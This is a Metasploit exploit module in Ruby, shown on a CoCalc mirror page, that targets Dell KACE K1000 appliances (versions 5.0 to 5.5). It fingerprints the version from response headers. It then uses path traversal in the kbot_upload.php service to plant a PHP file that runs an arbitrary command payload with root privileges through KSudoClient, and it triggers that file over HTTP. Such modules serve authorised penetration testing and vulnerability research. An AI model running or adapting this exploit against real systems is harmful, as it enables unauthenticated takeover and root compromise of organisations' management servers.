CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/http/dell_kace_k1000_upload.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'Dell KACE K1000 File Upload',

14
      'Description'    => %q{

15
          This module exploits a file upload vulnerability in Kace K1000

16
        versions 5.0 to 5.3, 5.4 prior to 5.4.76849 and 5.5 prior to 5.5.90547

17
        which allows unauthenticated users to execute arbitrary commands

18
        under the context of the 'www' user.

19


20
        This module also abuses the 'KSudoClient::RunCommandWait' function

21
        to gain root privileges.

22


23
        This module has been tested successfully with Dell KACE K1000

24
        version 5.3.

25
      },

26
      'License'        => MSF_LICENSE,

27
      'Privileged'     => true,

28
      'Platform'       => 'unix', # FreeBSD

29
      'Arch'           => ARCH_CMD,

30
      'Author'         =>

31
        [

32
          'Bradley Austin (steponequit)', # Initial discovery and exploit

33
          'bcoles', # Metasploit

34
        ],

35
      'References'     =>

36
        [

37
          ['URL', 'http://console-cowboys.blogspot.com/2014/03/the-curious-case-of-ninjamonkeypiratela.html']

38
        ],

39
      'Payload'        =>

40
        {

41
          'Space'       => 1024,

42
          'BadChars'    => "\x00\x27",

43
          'DisableNops' => true,

44
          'Compat'      =>

45
            {

46
              'PayloadType' => 'cmd',

47
              'RequiredCmd' => 'generic perl'

48
            }

49
        },

50
      'DefaultTarget'  => 0,

51
      'Targets'        =>

52
        [

53
          ['Automatic Targeting', { 'auto' => true }]

54
        ],

55
      'DisclosureDate' => '2014-03-07'))

56
  end

57


58
  def check

59
    res = send_request_cgi('uri' => normalize_uri('service', 'kbot_upload.php'))

60
    unless res

61
      vprint_error('Connection failed')

62
      return Exploit::CheckCode::Unknown

63
    end

64
    if res.code && res.code == 500 && res.headers['X-DellKACE-Appliance'].downcase == 'k1000'

65
      if res.headers['X-DellKACE-Version'] =~ /\A([0-9])\.([0-9])\.([0-9]+)\z/

66
        vprint_status("Found Dell KACE K1000 version #{res.headers['X-DellKACE-Version']}")

67
        if $1.to_i == 5 && $2.to_i <= 3                         # 5.0 to 5.3

68
          return Exploit::CheckCode::Vulnerable

69
        elsif $1.to_i == 5 && $2.to_i == 4 && $3.to_i <= 76849  # 5.4 prior to 5.4.76849

70
          return Exploit::CheckCode::Vulnerable

71
        elsif $1.to_i == 5 && $2.to_i == 5 && $3.to_i <= 90547  # 5.5 prior to 5.5.90547

72
          return Exploit::CheckCode::Vulnerable

73
        end

74
        return Exploit::CheckCode::Safe

75
      end

76
      return Exploit::CheckCode::Detected

77
    end

78
    Exploit::CheckCode::Safe

79
  end

80


81
  def exploit

82
    # upload payload

83
    fname = ".#{rand_text_alphanumeric(rand(8) + 5)}.php"

84
    payload_path = "/kbox/kboxwww/tmp/"

85
    post_data = "<?php require_once 'KSudoClient.class.php';KSudoClient::RunCommandWait('rm #{payload_path}#{fname};#{payload.encoded}');?>"

86
    print_status("Uploading #{fname} (#{post_data.length} bytes)")

87
    res = send_request_cgi(

88
      'uri' => normalize_uri('service', 'kbot_upload.php'),

89
      'method' => 'POST',

90
      'vars_get' => Hash[{

91
        'filename' => fname,

92
        'machineId' => "#{'../' * (rand(5) + 4)}#{payload_path}",

93
        'checksum' => 'SCRAMBLE',

94
        'mac' => rand_text_alphanumeric(rand(8) + 5),

95
        'kbotId' => rand_text_alphanumeric(rand(8) + 5),

96
        'version' => rand_text_alphanumeric(rand(8) + 5),

97
        'patchsecheduleid' => rand_text_alphanumeric(rand(8) + 5) }.to_a.shuffle],

98
      'data' => post_data)

99


100
    unless res

101
      fail_with(Failure::Unreachable, 'Connection failed')

102
    end

103


104
    if res.code && res.code == 200

105
      print_good('Payload uploaded successfully')

106
    else

107
      fail_with(Failure::UnexpectedReply, 'Unable to upload payload')

108
    end

109


110
    # execute payload

111
    res = send_request_cgi('uri' => normalize_uri('tmp', fname))

112


113
    unless res

114
      fail_with(Failure::Unreachable, 'Connection failed')

115
    end

116


117
    if res.code && res.code == 200

118
      print_good('Payload executed successfully')

119
    elsif res.code && res.code == 404

120
      fail_with(Failure::NotVulnerable, "Could not find payload '#{fname}'")

121
    else

122
      fail_with(Failure::UnexpectedReply, 'Unable to execute payload')

123
    end

124
  end

125
end

126


127